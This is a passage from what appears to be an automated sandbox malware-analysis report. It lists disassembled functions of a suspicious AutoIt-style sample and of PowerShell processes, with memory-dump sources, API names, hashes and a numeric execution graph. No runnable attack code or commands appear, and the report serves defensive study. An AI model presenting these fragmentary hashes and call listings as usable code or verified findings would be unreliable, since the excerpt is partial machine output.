                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1301DB61E1C58291EA20D714E0501F96330FF85384F885731E59ED7ADADF6DD609CB00
                                                                                                                                                                                                                    Function 00007FF656CF15B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                    • String ID: !$tan
                                                                                                                                                                                                                    • API String ID: 3384550415-2428968949
                                                                                                                                                                                                                    • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                                                                                                                    • Instruction ID: d06f6b3c2f19dd35c8fddd261264a614ed174f2412054fbd38f9a3efc24fb101
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C019671A28B8541DA15CF12A40033AB1A2BBDA7D4F545334E95E1BF84EF7DD1508B00
                                                                                                                                                                                                                    Function 00007FF656CF14FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                    • String ID: !$sin
                                                                                                                                                                                                                    • API String ID: 3384550415-1565623160
                                                                                                                                                                                                                    • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                                                                                                                                    • Instruction ID: b22966df60e6dafa90d7da492bde750bc2bdd1c63db0c354edacbb5e64623dfc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C0188B1E18B8545D615CF22944037AB262BFDA7D4F544335E95E2AF84EF7ED1408B00
                                                                                                                                                                                                                    Function 00007FF656CF14E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                                                                                                    • String ID: !$cos
                                                                                                                                                                                                                    • API String ID: 3384550415-1949035351
                                                                                                                                                                                                                    • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                                                                                                                                    • Instruction ID: 85d5490a1586c85525c242b46e03fef0a4ea621d4abbe9d0a72aff5b2b020e58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD01D8B1E18B8941D615CF22940033AB162BFDA7D4F504334E95E2AFC5EF7ED0508B00
                                                                                                                                                                                                                    Function 00007FF656CF1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _handle_error
                                                                                                                                                                                                                    • String ID: "$exp
                                                                                                                                                                                                                    • API String ID: 1757819995-2878093337
                                                                                                                                                                                                                    • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                                                                                                                                    • Instruction ID: d57e1dfa94a0dbeaa6c8d2553a5f8961873a2e91cfd1ecafe6932033b79359b0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F101C876938B8883E320CF24D0452AAB7B0FFEA344F241315E7442AA60CB7ED485DF00
                                                                                                                                                                                                                    Function 00007FF656D1C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                    • Opcode ID: 3d06eba564e5b366244cf695957a2db536531c6be5f447cfa12e7fa14b357f22
                                                                                                                                                                                                                    • Instruction ID: 2a2c5118bd82804c9bd9176927832e6504e20f37e57351237fcaab505bfbeda3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d06eba564e5b366244cf695957a2db536531c6be5f447cfa12e7fa14b357f22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0A760B1828642E7286351F1553B932619F48780F585A31D909ABB9ACDBEE4C1C300
                                                                                                                                                                                                                    Function 00007FF656CD75C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 00007FF656CD75E9
                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FF656CD7241,?,?,?,?,00007FF656CD660C,?,?,?,?,00007FF656CD4CD3), ref: 00007FF656CD7600
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Valuetry_get_function
                                                                                                                                                                                                                    • String ID: FlsSetValue
                                                                                                                                                                                                                    • API String ID: 738293619-3750699315
                                                                                                                                                                                                                    • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                                                                                                                                    • Instruction ID: a9c7b6bf69fb3df8748f59de58ad7ff69e9984e56388c63d3caed0668d7c3624
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E065A1A1858281EB054B55E4044B83371BF48B91F4C4632D90DDB255CE3FD485C650
                                                                                                                                                                                                                    Function 00007FF656CD5620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF656CD5629
                                                                                                                                                                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF656CD563A
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD7018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656CD563F), ref: 00007FF656CD708D
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD7018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656CD563F), ref: 00007FF656CD70BF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                                                    • API String ID: 3561508498-410509341
                                                                                                                                                                                                                    • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                                                                                                                    • Instruction ID: 9e37db7c4945396c66165274d6fd713a6fba8767fcf536813a7a42bb859fb461
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED05E62A189C691DF10EF04D8903A8B330FB90348FD84A32E24DD25B9EF3ED64AD340

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00007FFD32CB099E Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001C.00000002.2584550890.00007FFD32CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CB0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd32cb0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d9dbd908a8a3976d458647e3adc5fe8eccc312f105d723d4e87e4335184dbce5
                                                                                                                                                                                                                    • Instruction ID: eb8e92681673c8067f1fa9894819f4bf627be004ded1661b91f939e3aa741999
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dbd908a8a3976d458647e3adc5fe8eccc312f105d723d4e87e4335184dbce5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5614522F0EA8A0FFBA996680C712BD76C1EF95312B5805BED14DC31D3EDC8AC109341
                                                                                                                                                                                                                    Function 00007FFD32CB09EA Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001C.00000002.2584550890.00007FFD32CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CB0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd32cb0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 451843b9f663c3897b05c12f8f10b4ea6cf56d77fcc5944e52186c183d4ea9d3
                                                                                                                                                                                                                    • Instruction ID: e9e4e41164bed11e0f5ab42f7c01ab13268a118e82c89fbb8e7640e5631630dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 451843b9f663c3897b05c12f8f10b4ea6cf56d77fcc5944e52186c183d4ea9d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36413B12F4FA8B0FF7A996680CB527C66C1AF56352B5805BDD24DC31D3DDD8AC116301
                                                                                                                                                                                                                    Function 00007FFD32BE33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001C.00000002.2583277460.00007FFD32BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32BE0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd32be0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                    • Instruction ID: dc142f5f4a445b9149014b2a5e2ccee297e169cd20d643d6b4135da515b17e33
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F901A73020CB0C4FDB44EF0CE051AB5B3E0FB89360F10052DE58AC3651DA36E882CB42

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:3.9%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                    Total number of Limit Nodes:109
                                                                                                                                                                                                                    execution_graph 97619 351055 97624 352a19 97619->97624 97635 361207 97624->97635 97628 38c3aa 97630 352b24 97630->97628 97631 35105a 97630->97631 97643 3513f8 59 API calls 2 library calls 97630->97643 97632 372f70 97631->97632 97689 372e74 97632->97689 97634 351064 97644 370fe6 97635->97644 97637 361228 97638 370fe6 Mailbox 59 API calls 97637->97638 97639 352a87 97638->97639 97640 351256 97639->97640 97682 351284 97640->97682 97643->97630 97646 370fee 97644->97646 97647 371008 97646->97647 97649 37100c std::exception::exception 97646->97649 97654 37593c 97646->97654 97671 3735d1 DecodePointer 97646->97671 97647->97637 97672 3787cb RaiseException 97649->97672 97651 371036 97673 378701 58 API calls _free 97651->97673 97653 371048 97653->97637 97655 3759b7 97654->97655 97667 375948 97654->97667 97680 3735d1 DecodePointer 97655->97680 97657 3759bd 97681 378d58 58 API calls __getptd_noexit 97657->97681 97660 37597b RtlAllocateHeap 97660->97667 97670 3759af 97660->97670 97662 3759a3 97678 378d58 58 API calls __getptd_noexit 97662->97678 97666 375953 97666->97667 97674 37a39b 58 API calls 2 library calls 97666->97674 97675 37a3f8 58 API calls 7 library calls 97666->97675 97676 3732cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97666->97676 97667->97660 97667->97662 97667->97666 97668 3759a1 97667->97668 97677 3735d1 DecodePointer 97667->97677 97679 378d58 58 API calls __getptd_noexit 97668->97679 97670->97646 97671->97646 97672->97651 97673->97653 97674->97666 97675->97666 97677->97667 97678->97668 97679->97670 97680->97657 97681->97670 97683 351291 97682->97683 97684 351275 97682->97684 97683->97684 97685 351298 RegOpenKeyExW 97683->97685 97684->97630 97685->97684 97686 3512b2 RegQueryValueExW 97685->97686 97687 3512e8 RegCloseKey 97686->97687 97688 3512d3 97686->97688 97687->97684 97688->97687 97690 372e80 _flsall 97689->97690 97697 373447 97690->97697 97696 372ea7 _flsall 97696->97634 97714 379e3b 97697->97714 97699 372e89 97700 372eb8 DecodePointer DecodePointer 97699->97700 97701 372e95 97700->97701 97702 372ee5 97700->97702 97711 372eb2 97701->97711 97702->97701 97760 3789d4 59 API calls __write_nolock 97702->97760 97704 372f48 EncodePointer EncodePointer 97704->97701 97705 372ef7 97705->97704 97707 372f1c 97705->97707 97761 378a94 61 API calls 2 library calls 97705->97761 97707->97701 97709 372f36 EncodePointer 97707->97709 97762 378a94 61 API calls 2 library calls 97707->97762 97709->97704 97710 372f30 97710->97701 97710->97709 97763 373450 97711->97763 97715 379e5f EnterCriticalSection 97714->97715 97716 379e4c 97714->97716 97715->97699 97721 379ec3 97716->97721 97718 379e52 97718->97715 97745 3732e5 58 API calls 3 library calls 97718->97745 97722 379ecf _flsall 97721->97722 97723 379ef0 97722->97723 97724 379ed8 97722->97724 97730 379f11 _flsall 97723->97730 97749 378a4d 58 API calls 2 library calls 97723->97749 97746 37a39b 58 API calls 2 library calls 97724->97746 97726 379edd 97747 37a3f8 58 API calls 7 library calls 97726->97747 97729 379f05 97732 379f0c 97729->97732 97733 379f1b 97729->97733 97730->97718 97731 379ee4 97748 3732cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97731->97748 97750 378d58 58 API calls __getptd_noexit 97732->97750 97735 379e3b __lock 58 API calls 97733->97735 97737 379f22 97735->97737 97739 379f47 97737->97739 97740 379f2f 97737->97740 97752 372f85 97739->97752 97751 37a05b InitializeCriticalSectionAndSpinCount 97740->97751 97743 379f3b 97758 379f63 LeaveCriticalSection _doexit 97743->97758 97746->97726 97747->97731 97749->97729 97750->97730 97751->97743 97753 372f8e RtlFreeHeap 97752->97753 97754 372fb7 __dosmaperr 97752->97754 97753->97754 97755 372fa3 97753->97755 97754->97743 97759 378d58 58 API calls __getptd_noexit 97755->97759 97757 372fa9 GetLastError 97757->97754 97758->97730 97759->97757 97760->97705 97761->97707 97762->97710 97766 379fa5 LeaveCriticalSection 97763->97766 97765 372eb7 97765->97696 97766->97765 97767 355ff5 97791 355ede Mailbox _memmove 97767->97791 97768 370fe6 59 API calls Mailbox 97768->97791 97769 356a9b 98021 35a9de 291 API calls 97769->98021 97772 38eff9 97773 355190 Mailbox 59 API calls 97772->97773 97776 38efeb 97773->97776 97774 38f007 98042 3ba48d 89 API calls 4 library calls 97774->98042 97805 355569 Mailbox 97776->97805 98041 3a6cf1 59 API calls Mailbox 97776->98041 97779 3560e5 97780 38e137 97779->97780 97785 3563bd Mailbox 97779->97785 97792 356abc 97779->97792 97801 356152 Mailbox 97779->97801 97780->97785 98022 3a7aad 59 API calls 97780->98022 97783 370fe6 Mailbox 59 API calls 97788 3563d1 97783->97788 97785->97783 97798 356426 97785->97798 97790 3563de 97788->97790 97788->97792 97793 356413 97790->97793 97794 38e172 97790->97794 97791->97768 97791->97769 97791->97772 97791->97774 97791->97779 97791->97792 97791->97805 97839 3553b0 97791->97839 98020 35523c 59 API calls 97791->98020 98025 361c9c 97791->98025 98029 3b7f11 59 API calls Mailbox 97791->98029 98030 361a36 97791->98030 98034 3cc355 291 API calls Mailbox 97791->98034 98035 3a6cf1 59 API calls Mailbox 97791->98035 98040 3ba48d 89 API calls 4 library calls 97792->98040 97793->97798 97822 355447 Mailbox 97793->97822 98023 3cc87c 85 API calls 2 library calls 97794->98023 98024 3cc9c9 95 API calls Mailbox 97798->98024 97800 38e19d 97800->97800 97801->97776 97801->97792 97801->97805 97815 38e2e9 VariantClear 97801->97815 97867 3ce60c 97801->97867 97870 3b413a 97801->97870 97873 3bd6be 97801->97873 97918 3b412a 97801->97918 97921 3c5e1d 97801->97921 97946 3642cf 97801->97946 97950 3c495b 97801->97950 97959 35d679 97801->97959 97999 3c4b25 97801->97999 98008 3cf1b2 97801->98008 98015 355190 97801->98015 98036 3a7aad 59 API calls 97801->98036 97803 38e691 98037 3ba48d 89 API calls 4 library calls 97803->98037 97804 38f165 98044 3ba48d 89 API calls 4 library calls 97804->98044 97807 370fe6 59 API calls Mailbox 97807->97822 97809 3569fa 97816 361c9c 59 API calls 97809->97816 97811 38e6a0 97812 3569ff 97812->97803 97812->97804 97814 38ea9a 97820 361c9c 59 API calls 97814->97820 97815->97801 97816->97805 97817 361c9c 59 API calls 97817->97822 97818 361207 59 API calls 97818->97822 97820->97805 97821 3a7aad 59 API calls 97821->97822 97822->97803 97822->97805 97822->97807 97822->97809 97822->97812 97822->97814 97822->97817 97822->97818 97822->97821 97823 372f70 67 API calls __cinit 97822->97823 97824 38eb67 97822->97824 97826 38ef28 97822->97826 97828 355a1a 97822->97828 98013 357e50 291 API calls 2 library calls 97822->98013 98014 356e30 60 API calls Mailbox 97822->98014 97823->97822 97824->97805 98038 3a7aad 59 API calls 97824->98038 98039 3ba48d 89 API calls 4 library calls 97826->98039 98043 3ba48d 89 API calls 4 library calls 97828->98043 97840 3553cf 97839->97840 97862 3553fd Mailbox 97839->97862 97841 370fe6 Mailbox 59 API calls 97840->97841 97841->97862 97842 372f70 67 API calls __cinit 97842->97862 97843 3569fa 97844 361c9c 59 API calls 97843->97844 97863 355569 Mailbox 97844->97863 97845 3569ff 97847 38e691 97845->97847 97848 38f165 97845->97848 97846 361207 59 API calls 97846->97862 98047 3ba48d 89 API calls 4 library calls 97847->98047 98051 3ba48d 89 API calls 4 library calls 97848->98051 97852 38e6a0 97852->97791 97853 370fe6 59 API calls Mailbox 97853->97862 97855 38ea9a 97858 361c9c 59 API calls 97855->97858 97856 361c9c 59 API calls 97856->97862 97858->97863 97859 38eb67 97859->97863 98048 3a7aad 59 API calls 97859->98048 97860 3a7aad 59 API calls 97860->97862 97862->97842 97862->97843 97862->97845 97862->97846 97862->97847 97862->97853 97862->97855 97862->97856 97862->97859 97862->97860 97862->97863 97864 38ef28 97862->97864 97866 355a1a 97862->97866 98045 357e50 291 API calls 2 library calls 97862->98045 98046 356e30 60 API calls Mailbox 97862->98046 97863->97791 98049 3ba48d 89 API calls 4 library calls 97864->98049 98050 3ba48d 89 API calls 4 library calls 97866->98050 98052 3cd1c6 97867->98052 97869 3ce61c 97869->97801 98210 3b494a GetFileAttributesW 97870->98210 97874 3bd6e8 97873->97874 97875 3bd6dd 97873->97875 97879 361207 59 API calls 97874->97879 97917 3bd7c2 Mailbox 97874->97917 98297 35502b 97875->98297 97877 370fe6 Mailbox 59 API calls 97878 3bd80b 97877->97878 97880 3bd817 97878->97880 98301 363df7 97878->98301 97881 3bd70c 97879->97881 97885 354d37 84 API calls 97880->97885 97882 361207 59 API calls 97881->97882 97884 3bd715 97882->97884 97887 354d37 84 API calls 97884->97887 97886 3bd82f 97885->97886 98286 363e47 97886->98286 97889 3bd721 97887->97889 98214 370119 97889->98214 97892 3bd842 GetLastError 97897 3bd85b 97892->97897 97893 3bd736 98265 3617e0 97893->98265 97895 3bd8d8 97901 370fe6 Mailbox 59 API calls 97895->97901 97896 3bd8a1 97900 370fe6 Mailbox 59 API calls 97896->97900 97914 3bd7cb Mailbox 97897->97914 98310 363f0b CloseHandle 97897->98310 97899 3bd876 97899->97895 97899->97896 97902 3bd8a6 97900->97902 97906 3bd8dd 97901->97906 97907 3bd8b7 97902->97907 97909 361207 59 API calls 97902->97909 97904 35502b 59 API calls 97904->97917 97905 3b412a 3 API calls 97908 3bd779 97905->97908 97910 361207 59 API calls 97906->97910 97906->97914 98311 3bfc0d 59 API calls 2 library calls 97907->98311 97912 361a36 59 API calls 97908->97912 97916 3bd793 Mailbox 97908->97916 97909->97907 97910->97914 97913 3bd78a 97912->97913 98274 3b3f1d 97913->98274 97914->97801 97916->97904 97917->97877 97917->97914 97919 3b494a 3 API calls 97918->97919 97920 3b4131 97919->97920 97920->97801 97922 3c5e46 97921->97922 97923 3c5e74 WSAStartup 97922->97923 97924 35502b 59 API calls 97922->97924 97925 3c5e9d 97923->97925 97945 3c5e88 Mailbox 97923->97945 97927 3c5e61 97924->97927 98407 3640cd 97925->98407 97927->97923 97930 